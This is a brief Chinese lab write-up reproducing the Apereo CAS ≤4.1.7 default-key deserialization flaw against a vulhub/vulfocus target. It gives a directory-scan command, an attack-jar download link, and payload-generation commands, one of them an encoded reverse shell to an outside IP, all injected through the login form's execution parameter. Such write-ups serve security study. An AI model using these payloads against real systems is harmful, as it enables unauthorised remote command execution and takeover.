所有文章,仅供安全研究与学习之用,后果自负!
- apereo-cas 命令执行 4.1
- 0x01 漏洞描述
- 0x02 影响范围
- 0x03 漏洞复现
- 漏洞检测
- 漏洞利用
- 0x04 漏洞修复
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
0x02 影响范围Apereo CAS <= 4.1.7 /css/login0x03 漏洞复现
(1)访问vulhub 在线靶场
目录扫描
python3 dirsearch.py -e "*" -x 400,500 -t 100 -r 10 -u http://vulfocus.fofa.so:20866/
(2) 漏洞存在地址
/css/login
http://vulfocus.fofa.so:9288/cas/login
漏洞检测漏洞利用参数 登录处 抓包 可看到
execution漏洞利用
工具 apereo-cas-attack-1.0-SNAPSHOT-all.jar
https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar
利用方法
要执行的命令 在后边输入 反弹shell需要编码
可以先dnslog检测
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/test"
反弹shell
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGVMjkuNjcuNC85ODk3IDA+JjE=}|{base64,-d}|{bash,-i}"
复制生成的payload 到burp 中 execution参数中
反弹shell成功
升级到最新版本
